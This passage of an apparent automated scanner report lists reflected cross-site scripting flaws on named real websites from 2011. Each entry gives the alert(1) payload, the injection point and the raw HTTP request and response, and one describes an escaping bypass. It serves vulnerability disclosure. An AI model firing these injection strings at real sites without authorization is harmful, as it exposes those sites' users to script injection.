Set-Cookie: utid=fc1779aa9d7d7c141c5e70f330ba9a08; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=f78dfeddf44d1f1a44ae372c91944e8b45fbee83; path=/; expires=Mon, 07-Mar-2011 13:34:39 GMT; HttpOnly
Content-Length: 7112
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 05:39:39 -0800
Connection: close
Date: Mon, 28 Feb 2011 13:34:39 GMT
Server: lighttpd/1.4.26
3.90. http://us.levi.com/home/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://us.levi.com
Path: /home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 51023--><script>alert(1)</script>0b3fa4e8229 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/index.jsp?51023--><script>alert(1)</script>0b3fa4e8229=1 HTTP/1.1
Host: us.levi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:03 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=cpsrNrkLNJy63ggLX4dbMYj6NN6w2Xgtrtb39YMcXzJsdGqQQnwQ!-1476944712; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22114
3.91. http://videos.howstuffworks.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://videos.howstuffworks.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd75f"><script>alert(1)</script>f4645cc2285 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?fd75f"><script>alert(1)</script>f4645cc2285=1 HTTP/1.1
Host: videos.howstuffworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.92. http://virtacore.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://virtacore.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f87a</script><script>alert(1)</script>0429db0f622 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8f87a</script><script>alert(1)</script>0429db0f622=1 HTTP/1.1
Host: virtacore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=31613;expires=Wed, 20-Feb-2041 13:33:57 GMT;path=/
Set-Cookie: CFTOKEN=65867355;expires=Wed, 20-Feb-2041 13:33:57 GMT;path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:33:57 GMT
Connection: close
Content-Length: 16534
3.93. http://volumelicensing.adobe.com/store/adbevlus/DisplayHomePage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://volumelicensing.adobe.com
Path: /store/adbevlus/DisplayHomePage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 82817--><script>alert(1)</script>46b3e6bc807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/adbevlus/DisplayHomePage?82817--><script>alert(1)</script>46b3e6bc807=1 HTTP/1.1
Host: volumelicensing.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.215:516-0#0"; path=/
Set-Cookie: JSESSIONID=8CFFDBA1EB4BACE2EF483D1DE201F4A2; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43674E9C30E969DDB6188A8DBDD5F1A02F5B; expires=Tue, 28-Feb-2012 19:23:24 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101713006805,0)
Content-Length: 53482
Date: Mon, 28 Feb 2011 13:34:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app83
Connection: close
Set-Cookie: BIGipServerp-drh-dc1pod8-pool1-active=3607232778.516.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?82817--><script>alert(1)</script>46b3e6bc807=1&Action=DisplayESIPage&Currency=USD&ESIHC=f4a37a06&Env=BASE&Locale=en_US&SiteID=adbevlus&StyleID=35830700&StyleVersion=9&ceid=168730900&cename=TopHeader&id=HomePage&script> ...[SNIP]...
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 93404<script>alert(1)</script>4fe0689991c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/getApi.php?return=json&cb=logger.getPubGA_onSuccess93404<script>alert(1)</script>4fe0689991c&service=getPublisherDomains&publisher=null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share5x/index.09d1e4c2e185e924c1f8716db0b87f2c.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 114
logger.getPubGA_onSuccess93404<script>alert(1)</script>4fe0689991c(FAILED TO CONNECT TO read USING _connect_read);
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c8398<script>alert(1)</script>a659ef576a7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /proxy.php HTTP/1.1
Host: auth.idgenterprise.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8398<script>alert(1)</script>a659ef576a7
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:29:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.8
Content-Length: 883
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5265a'%3balert(1)//8e077baef99 was submitted in the Referer HTTP header. This input was echoed as 5265a';alert(1)//8e077baef99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /play.html?code=19842;6812;5711;0&from= HTTP/1.1
Host: optimized-by.simply.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5265a'%3balert(1)//8e077baef99
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:04:13 GMT
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE'
Set-Cookie: ToBeValidatedFrom=; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/
Set-Cookie: ToBeValidated="http://www.google.com/search?hl=en&q=5265a';alert(1)//8e077baef99"; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/
Set-Cookie: ad_simply_viewer=a6d205ac-7061-44be-bd96-387cfe92809a; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 883
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14cfc\"%3balert(1)//3209b2fa1bc was submitted in the Referer HTTP header. This input was echoed as 14cfc\\";alert(1)//3209b2fa1bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /flowers/18-Red-Roses-30050119 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=14cfc\"%3balert(1)//3209b2fa1bc
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a02b"><script>alert(1)</script>292174cd4fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /order/checkout.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a02b"><script>alert(1)</script>292174cd4fc
Response
HTTP/1.1 200 OK
Server: Avangate
Date: Mon, 28 Feb 2011 13:33:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=sha4ogohkdq9ujl9uv099cme4hu0j8i8; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=4a02b"><script>alert(1)</script>292174cd4fc"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab503'-alert(1)-'da78fba5742 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /en/website_monitoring_features.php HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:33:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-bc33fbe3ba87f60456a55cf7956d2bc7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742::website_monitoring_features.php'); var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742'); if(document && document.referrer){ jsRef = encode ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 11765<script>alert(1)</script>58ae9e1a948 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11765<script>alert(1)</script>58ae9e1a948
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:33:58 GMT
Expires: Mon, 28 Feb 2011 13:33:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCACQDRST=OJECHOCBILOBLCCEGKFELFNA; path=/
X-Powered-By: ASP.NET
Content-Length: 832
Connection: Close
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 6e145<script>alert(1)</script>2d2eac4a296 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e145<script>alert(1)</script>2d2eac4a296
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:33:59 GMT
Expires: Mon, 28 Feb 2011 13:33:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQCSBSST=IBOGMCDBGNJIKFEFIPGBLJIL; path=/
X-Powered-By: ASP.NET
Content-Length: 668
Connection: Close
The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18199%3balert(1)//9a06f7cdff8 was submitted in the eyeblaster cookie. This input was echoed as 18199;alert(1)//9a06f7cdff8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2096754&PluID=0&w=640&h=480&ord=ADXRAND&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/2/0/%2a/p%3B234075239%3B0-0%3B0%3B42936999%3B255-0/0%3B40023356/40041143/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CCSO_verisign_fy11q5_online_WelAd_022811%2CC%3DVerisign%2CP%3DCSO%2CA%3DVerisign%2CK%3D461260/0.2935413271188736/0/tc%2cac%2cl2c%2cc:/$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=18199%3balert(1)//9a06f7cdff8; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; A3=hvPTaiJy0c6L00001hK5Samaw0bfZ00001hK5JalZa0bfZ00002gIlWai180aCf00001heSmakII0c9M00001gnhgai180cbS00001; B3=8z6A0000000003tr8r8g0000000001tf8z130000000001th8qaI0000000001tn7.Ws0000000001tf
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gnesamti0cbS00001hvPTaiJy0c6L00001hK5Samaw0bfZ00001hK5JalZa0bfZ00002gIlWai180aCf00001heSmakII0c9M00001gnhgai180cbS00001; expires=Sun, 29-May-2011 07:46:03 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8z6A0000000003tr8r8g0000000001tf7.VO0000000001ts8z130000000001th8qaI0000000001tn7.Ws0000000001tf; expires=Sun, 29-May-2011 07:46:03 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 28 Feb 2011 12:46:02 GMT
Connection: close
Content-Length: 2136
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... ]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4289436).replace(/\[%tp_flightid%\]/ig,2096754).replace(/\[%tp_campaignid%\]/ig,134060);}var ebO = new Object();ebO.w=640;ebO.h=480;ebO.ai=4289436;ebO.pi=0;ebO.d=18199;alert(1)//9a06f7cdff8;ebO.rnd=40602271559820;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5f27a<script>alert(1)</script>e86f93e77dc was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F486324%2Fsecurity-tools-templates-policies&jsref=http%3A%2F%2Fwww.csoonline.com%2Fsolution-centers%2Fncircle%3Fitem%3D5%26tab%3D1%26from%3Dcso%26src%3Dcsozne&rnd=1298897210885 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==5f27a<script>alert(1)</script>e86f93e77dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 28 Feb 2011 12:46:33 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1200